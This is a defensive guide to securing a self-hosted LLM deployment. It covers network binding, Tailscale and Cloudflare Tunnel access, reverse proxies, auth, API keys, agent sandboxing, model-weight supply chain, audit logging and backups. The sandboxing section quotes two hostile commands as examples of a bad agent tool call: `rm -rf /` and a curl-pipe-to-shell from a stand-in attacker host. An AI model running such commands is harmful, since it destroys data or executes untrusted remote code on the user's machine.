Securing a local-AI deployment
Network exposure, reverse proxies, Tailscale + Cloudflare Tunnel, auth layers, API-key management, sandboxing for agent code execution, supply-chain risks for model weights, audit logging, and the threat model that matters for homelab and team deployments.
Why local-AI security is its own threat model
Cloud LLM threat models are well-developed: rate limiting, abuse detection, prompt-injection defense at the platform level, audit retention by the vendor. None of that comes free with a self-hosted deployment. The default Ollama install accepts requests from anyone who can reach port 11434. Open WebUI in default mode allows open signups. vLLM ships with no auth enabled out of the box.
That's not a bug — those tools target operators who'll add the auth layer themselves. But the operator who skips it is one network misconfiguration away from public exposure.
The threat models that actually matter
Three threat profiles, in increasing order of seriousness:
- Solo homelab. Threat: someone on your LAN reaches your AI services. Mitigation: bind to loopback, expose only via Tailscale. Time investment: 10 minutes.
- Small team / household. Threat: an accidentally-exposed port; a compromised browser session; a curious household member. Mitigation: auth on Open WebUI, SSO if available, Tailscale or VPN, per-user keys for the API gateway. Time: 1-2 hours.
- Multi-tenant production. Threat: the full OWASP LLM Top 10. Compromised model weights, prompt injection from RAG documents, data exfiltration via tool calls, audit-log tampering. Mitigation: every layer below, plus SSO + RBAC + audit retention + supply-chain pinning. Time: weeks of integration.
Network exposure: bind localhost, expose Caddy
The single highest-leverage security action: bind every inference / database / dashboard service to 127.0.0.1 and expose only the reverse proxy on the network interface. vLLM, Ollama, Qdrant, Prometheus, Grafana — all default to binding 0.0.0.0 in their Docker compose templates. Override that explicitly.
In a typical homelab Docker Compose file, bind ports as `127.0.0.1:8000:8000`, not `8000:8000`. Prefixing the host port with an IP address changes which interface the port is published on.
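A minimal Compose sketch of that override; the service names and ports here are illustrative, not the exact entries of any particular template:

```yaml
# docker-compose.override.yml (illustrative services and ports)
services:
  vllm:
    ports:
      - "127.0.0.1:8000:8000"     # loopback only; unreachable from the LAN
  ollama:
    ports:
      - "127.0.0.1:11434:11434"
  caddy:
    ports:
      - "443:443"                 # only the reverse proxy listens on the network interface
```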
Tailscale workflow: the homelab default
Tailscale (or any WireGuard-based mesh) is the right answer for homelab and small-team remote access. It avoids exposing 443 publicly; uses identity-based auth (Google / GitHub / Microsoft); has MagicDNS for human-readable hostnames; works from any device.
The configuration: install Tailscale on the workstation, log in. On client devices, log into the same tailnet. The workstation is now reachable via workstation.tail-net.ts.net. Bind Caddy to the tailnet interface; reach Caddy from any tailnet device.
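A sketch of the workstation side, assuming a Linux host and the standard install script; the MagicDNS hostname is the one used above:

```sh
# On the workstation
curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up          # opens a browser login to your identity provider

# Confirm the tailnet address and MagicDNS name
tailscale ip -4
tailscale status
# Devices on the same tailnet can now reach https://workstation.tail-net.ts.net
```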
Tailscale's free tier covers up to 100 devices with no bandwidth metering, which is enough for everything in /workflows/local-coding-agent-system and /workflows/private-chatgpt-replacement.
Cloudflare Tunnel + Access: the browser-only path
Cloudflare Tunnel is the alternative when (a) you need plain-browser access without installing a client, (b) you don't want to expose ports at all (the tunnel is outbound-only), or (c) you want Cloudflare Access SSO in front of the service.
The pattern: cloudflared runs on the workstation, opens an outbound tunnel to Cloudflare. Public DNS points ai.example.com at the tunnel. Cloudflare Access gates entry on Google / GitHub / email-based SSO. Browser users hit the public hostname; auth is handled at Cloudflare's edge.
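A sketch of the tunnel config, assuming cloudflared is already authenticated (`cloudflared tunnel login`) and a tunnel named `ai` has been created; hostnames, paths, and ports are placeholders:

```yaml
# ~/.cloudflared/config.yml
tunnel: ai
credentials-file: /home/user/.cloudflared/<tunnel-id>.json

ingress:
  - hostname: ai.example.com
    service: http://127.0.0.1:8080   # Open WebUI behind the tunnel
  - service: http_status:404         # catch-all: reject anything else
```

Run it with `cloudflared tunnel run ai` and point DNS at it with `cloudflared tunnel route dns ai ai.example.com`; the Access SSO policy itself is configured on the Cloudflare side, not in this file.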
Use this for Open WebUI when household / small-team members don't want a Tailscale client on every device. Don't use it for the inference engine itself.
Reverse proxy + TLS: Caddy / Traefik / nginx
Caddy is the right default for solo / homelab — auto-Let's-Encrypt, sensible HTTP/2 + HTTP/3 defaults, single-line Caddyfile per service. Traefik wins when you have many Docker services with auto-discovery; nginx wins when you already operate it elsewhere.
TLS is non-negotiable. Self-signed is fine for tailnet-only deployments (browsers complain but encryption is encryption); Let's Encrypt is free and works with Cloudflare DNS-01 challenges even when the service isn't publicly reachable.
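A minimal Caddyfile sketch of both cases; hostnames and the upstream port are placeholders:

```caddyfile
# Publicly resolvable (or DNS-01-verified) name: Caddy fetches the certificate automatically
chat.example.com {
    reverse_proxy 127.0.0.1:8080    # Open WebUI on loopback
}

# Tailnet-only name: use Caddy's internal CA (browsers will warn, traffic is still encrypted)
workstation.tail-net.ts.net {
    tls internal
    reverse_proxy 127.0.0.1:8080
}
```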
Auth layers: from solo password to SSO
The auth ladder, in order of operational maturity:
- Solo password on Open WebUI. Disable signup; set a strong owner password. Floor for solo deployments.
- Caddy basic-auth in front of services that have no auth of their own (Prometheus, Grafana). Floor for small-team deployments; a Caddyfile sketch follows this list.
- Open WebUI multi-user with admin-managed accounts. SQLite backing for < 20 users; Postgres above.
- Authelia / Authentik as SSO provider for multiple services. OIDC or SAML to corporate identity provider. Production tier.
- Per-app virtual keys via LiteLLM. The right primitive for a homelab API gateway — see /workflows/homelab-ai-api.
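For the basic-auth rung, a sketch of putting a password in front of a service that ships with none; the hostname is a placeholder, and the directive is `basic_auth` in recent Caddy versions (`basicauth` in older ones):

```caddyfile
grafana.home.example.com {
    basic_auth {
        # generate the hash with: caddy hash-password
        admin <bcrypt-hash>
    }
    reverse_proxy 127.0.0.1:3000
}
```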
API-key management: virtual keys + per-key budgets
Running a single API key across every personal project is a mistake: one runaway script consumes the entire budget, and you have no per-script attribution. LiteLLM's virtual-key feature solves this: issue a per-script key with a model whitelist, a monthly budget, and an RPM cap.
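A sketch of issuing one such key against a LiteLLM proxy's key-management endpoint; the field names follow LiteLLM's /key/generate API as I understand it, so verify them against the docs for your version, and the alias, model name, and limits are placeholders:

```sh
curl -s http://127.0.0.1:4000/key/generate \
  -H "Authorization: Bearer $LITELLM_MASTER_KEY" \
  -H "Content-Type: application/json" \
  -d '{
        "key_alias": "rss-summarizer",
        "models": ["llama-3.1-8b"],
        "max_budget": 5.0,
        "rpm_limit": 30,
        "duration": "30d"
      }'
```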
Production tier adds key rotation policies (90 days), automated revocation on user offboarding, and audit-log integration for compliance.
Sandboxing for agent code execution
Agent loops that execute code (OpenHands, Aider with shell tools, custom agents) have a higher risk profile than chat. The agent is non-deterministic; one bad tool call can run `rm -rf /` or `curl evil.example.com | sh`.
Sandbox the execution environment. Specifically (a combined docker run sketch follows this list):
- Rootless Docker containers for tool execution. The agent's Docker daemon runs as a non-root user; even a privileged-container escape lands in user-space.
- Network isolation: `--network=none` for tasks that don't need network access, a named Docker network for those that do.
- Read-only mounts for code under review. The agent can run tests; it cannot mutate the source tree without explicit approval.
- Resource limits: CPU / memory caps prevent a runaway agent loop from killing the workstation.
- No host secrets mounted into the sandbox. AWS / GCP credentials, GitHub tokens, SSH keys — none of these belong in the agent's environment.
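A sketch combining those controls into one invocation; the image name, mount paths, and test command are placeholders, and your agent framework may wire the equivalent settings differently:

```sh
# No network egress, unprivileged user, dropped capabilities,
# CPU/memory/PID caps, read-only root filesystem, source mounted read-only,
# and no host secrets passed through the environment.
docker run --rm \
  --network=none \
  --user 1000:1000 \
  --cap-drop=ALL \
  --security-opt no-new-privileges:true \
  --memory=4g --cpus=2 --pids-limit=256 \
  --read-only --tmpfs /tmp \
  -v "$PWD/repo:/workspace:ro" \
  agent-sandbox:latest pytest -p no:cacheprovider /workspace
```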
OpenHands does most of this by default; verify your agent framework's defaults rather than assuming.
Supply-chain risks: model weights, datasets, embeddings
Open-weight models are downloaded from Hugging Face / GitHub / model authors' hosting. The supply-chain risk: a malicious uploader could ship weights with embedded prompt-injection ("when asked X, output Y") or a poisoned tokenizer. The mitigations:
- Pin SHAs. Don't pull `llama-3.1-8b-instruct:latest`; pull a specific commit SHA. Hugging Face supports this; see the sketch after this list.
- Verify checksums against published values when offered.
- Trust the publisher. Meta's, Mistral's, Qwen's, DeepSeek's official repos are well-watched. Random forks are not.
- Embedding-model integrity especially matters — an embedding model swap silently changes every vector in your DB.
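A sketch of pinning a download to an exact revision with the Hugging Face CLI; the repo name is a real Meta repo, the revision is a placeholder for the commit you have vetted:

```sh
# Pin to an exact commit instead of whatever the default branch currently points at
huggingface-cli download meta-llama/Llama-3.1-8B-Instruct \
  --revision <commit-sha> \
  --local-dir ./models/llama-3.1-8b-instruct

# Verify against published checksums when the publisher provides them
sha256sum ./models/llama-3.1-8b-instruct/*.safetensors
```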
For private fine-tunes: treat the resulting weights as just as confidential as the source data. Anyone with checkpoint access can extract approximate training samples.
Audit logging: who saw what, when, why
Audit logs distinguish a serious deployment from a homelab toy. The minimum production audit set:
- Authentication events (login, logout, failed attempts).
- Per-call request metadata: timestamp, user, model, token count. Body is optional but high-value when storage allows.
- Configuration changes (admin actions in Open WebUI / LiteLLM admin).
- Tool-call events for agent loops (which tool, what arguments, what result).
Retention: 90 days for typical solo / small-team; 365+ days for regulated industries. Loki is the practical store; pipe to S3 / MinIO for long-term archive.
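As a concrete illustration, one per-call audit record carrying the minimum fields above; the schema is invented for illustration, not any tool's native format:

```json
{
  "ts": "2025-06-01T14:32:07Z",
  "event": "chat.completion",
  "user": "alice",
  "key_alias": "rss-summarizer",
  "model": "llama-3.1-8b",
  "prompt_tokens": 412,
  "completion_tokens": 186,
  "status": "ok"
}
```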
What ChatGPT-clones get wrong by default
The friction-free Open WebUI install is a beautiful UX and a default-insecure deployment. The specific defaults to override on day one (a Compose sketch follows this list):
- `WEBUI_AUTH=true`: keep auth on. The "no auth" mode is for testing.
- `ENABLE_SIGNUP=false` after the owner account exists.
- `WEBUI_SECRET_KEY` set to a strong random value (not the example).
- HTTPS enforced via Caddy. Open WebUI doesn't auto-redirect HTTP → HTTPS.
- Don't expose 8080 directly. Always behind a reverse proxy.
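Those overrides as a Compose sketch; the env var names come from Open WebUI itself, while the secret-generation command and port binding follow the earlier sections:

```yaml
services:
  open-webui:
    image: ghcr.io/open-webui/open-webui:main
    environment:
      - WEBUI_AUTH=true
      - ENABLE_SIGNUP=false                     # set once the owner account exists
      - WEBUI_SECRET_KEY=${WEBUI_SECRET_KEY}    # e.g. generated with: openssl rand -hex 32
    ports:
      - "127.0.0.1:8080:8080"                   # loopback only; Caddy terminates TLS in front
```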
Backup as a security concern
Backup is half maintenance, half security. The security half: an attacker who deletes your conversation history + vector DB + Open WebUI volume has destroyed your knowledge base. Encrypt backups at rest (age, gpg, or restic with a strong key). Store off-site. Test restores quarterly.
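A restic sketch of the encrypt-and-ship-off-site half, assuming an S3/MinIO target; the bucket, paths, and retention policy are placeholders:

```sh
export RESTIC_REPOSITORY="s3:https://minio.example.com/ai-backups"
export RESTIC_PASSWORD_FILE=/root/.restic-pass   # the encryption key: keep a copy off the box

restic init                                       # once, to create the encrypted repository
restic backup /srv/open-webui /srv/qdrant         # conversation history + vector DB volumes
restic forget --keep-daily 7 --keep-weekly 8 --prune
restic restore latest --target /tmp/restore-test  # the quarterly restore test
```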
Incident response when things go wrong
For solo homelab: if you suspect compromise, take the workstation off the network, snapshot the state, then rebuild from known-good backups + freshly-pulled images. Don't try to forensicate a homelab; it's not worth the time.
For production: standard incident response — isolate, preserve, investigate, remediate, retrospect. The OWASP LLM Top 10 is the right reading list. Pre-write a runbook for "agent leaked secrets via tool call" and "user prompt-injection extracted RAG document" — these are the local-AI-specific incidents that catch teams unprepared.
Adjacent: maintenance covers the long-tail operational discipline; observability covers the dashboards and alerts that let you notice trouble.